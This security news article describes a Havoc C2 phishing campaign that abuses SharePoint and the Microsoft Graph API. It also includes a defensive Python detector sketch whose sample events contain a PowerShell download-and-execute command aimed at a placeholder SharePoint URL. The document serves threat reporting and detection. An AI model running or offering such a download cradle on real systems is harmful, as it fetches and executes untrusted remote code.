A new phishing campaign has been uncovered, utilizing the open-source Havoc command-and-control (C2) framework to target organizations. This multi-stage attack is designed to bypass traditional security measures by embedding malicious activity within legitimate Microsoft services, such as SharePoint and the Microsoft Graph API. As attackers continue to refine their techniques, this campaign highlights the growing complexity of modern cyber threats.
The Attack
The phishing campaign begins with an email containing a seemingly innocuous HTML attachment named "Documents.html." This file leverages a social engineering technique called ClickFix, deceiving users into executing a PowerShell command. Once activated, the script downloads a remote PowerShell script from a SharePoint-hosted URL. The script first checks the environment for sandbox indicators and adjusts system settings to establish infection markers.
If the system lacks a Python interpreter, the script installs one before executing a hidden Python shellcode loader. This loader contains Russian-language debug messages and enables attackers to execute shellcode in memory, ensuring persistence. The attackers also use a GitHub-hosted shellcode loader called KaynLdr to obscure the malware's execution.
A key feature of this attack is the use of the Microsoft Graph API and SharePoint. The attackers modify the Havoc Demon Agent to communicate with their C2 server through these services, embedding malicious activity in seemingly legitimate SharePoint operations. Two files are created in the SharePoint document library, one for exfiltrating data and one for receiving commands from the C2 server. Communication through these files is AES-256 encrypted, adding a further layer of obfuscation.
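As an added illustration (not code from the article, the reporting researchers, or the Havoc project), the following Python sketch shows how a defender could correlate process-creation telemetry for the chain described above: a PowerShell download cradle pointing at a SharePoint URL that later spawns a Python interpreter. The event fields, file paths and the sharepoint.com host name are constructed assumptions for the demo, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:          # minimal process-creation record (Sysmon EID 1 style)
    pid: int
    ppid: int
    image: str
    cmdline: str

# Download-cradle verbs and a SharePoint host appearing in one PowerShell command line.
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)
SHAREPOINT_URL = re.compile(r"https?://[^\s'\"()]*sharepoint\.com", re.I)

def _name(ev):
    return ev.image.rsplit("\\", 1)[-1].lower()

def sharepoint_cradle(ev):
    """True for a PowerShell process that fetches and evaluates a script from SharePoint."""
    return _name(ev) in ("powershell.exe", "pwsh.exe") and bool(
        CRADLE.search(ev.cmdline) and SHAREPOINT_URL.search(ev.cmdline))

def find_chains(events):
    """Medium: a SharePoint cradle alone. High: a python.exe whose ancestry contains one."""
    by_pid = {ev.pid: ev for ev in events}
    findings = [{"severity": "medium", "pid": ev.pid, "chain": [ev.pid]}
                for ev in events if sharepoint_cradle(ev)]
    for ev in events:
        if not _name(ev).startswith("python"):
            continue
        chain, cur = [ev.pid], by_pid.get(ev.ppid)
        while cur is not None:                      # walk up the parent chain
            chain.append(cur.pid)
            if sharepoint_cradle(cur):
                findings.append({"severity": "high", "pid": ev.pid, "chain": chain})
                break
            cur = by_pid.get(cur.ppid)
    return findings

# Constructed sample events (not real telemetry): an explorer-launched PowerShell
# fetching a SharePoint-hosted script, which then spawns a Python interpreter.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "iex (iwr https://tenant-placeholder.sharepoint.com/s/stage.ps1)"'),
    ProcEvent(1200, 1100, r"C:\Users\user\AppData\Local\Programs\Python\python.exe",
              "python.exe -c <loader>"),
    ProcEvent(1300, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Process"),       # benign PowerShell, must not alert
]
```

Calling `find_chains(SAMPLE_EVENTS)` yields a medium finding for the cradle (pid 1100) and a high finding for the Python child (pid 1200, chain [1200, 1100]); the benign PowerShell produces nothing.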
What Undercode Says:
This phishing campaign showcases an alarming trend where cybercriminals are leveraging open-source tools, such as the Havoc C2 framework, in combination with established services like Microsoft Graph API. By using SharePoint as a communication channel, attackers manage to fly under the radar of traditional detection mechanisms. This method takes advantage of the trust inherent in Microsoft services, making it harder for security systems to differentiate between legitimate and malicious traffic.
The key to this attack lies in its sophistication. The attackers deploy a multi-stage infection process that begins with a simple phishing email but quickly escalates into a fully-fledged malware campaign. Through clever use of PowerShell, Python, and the Microsoft Graph API, they are able to maintain persistence, steal data, and issue commands remotely. By hiding their activity within trusted services, the attackers reduce the likelihood of detection.
One of the most striking aspects of this campaign is its use of the ClickFix social engineering technique. This tactic is particularly effective because it relies on human error, with users unknowingly executing the malicious PowerShell script. This highlights the importance of employee training in recognizing phishing attempts and malicious attachments.
The use of encrypted communication and the manipulation of registry entries further complicate detection efforts, making it difficult for conventional security tools to identify the attack's presence until it's too late. This underscores the growing need for advanced threat detection systems that are capable of recognizing sophisticated C2 traffic and monitoring for unusual activity across platforms like SharePoint.
Furthermore, the attackers' ability to conceal their malicious activity within Microsoft's legitimate services demonstrates how threat actors continue to evolve their methods. This attack is not only a wake-up call for organizations to adopt better security practices but also a reminder of the ever-evolving landscape of cyber threats.
Fact Checker Results
- Legitimate Sources Used: The use of Microsoft Graph API and SharePoint is accurate, as both are widely used services that can be exploited for malicious purposes.
- Phishing Technique: The ClickFix method described is a known social engineering tactic used to trick users into executing malicious scripts.
- Encryption and Obfuscation: AES-256 encryption and the use of tools like KaynLdr are consistent with known techniques for hiding malicious activity in advanced attacks.
References:
Reported By: https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/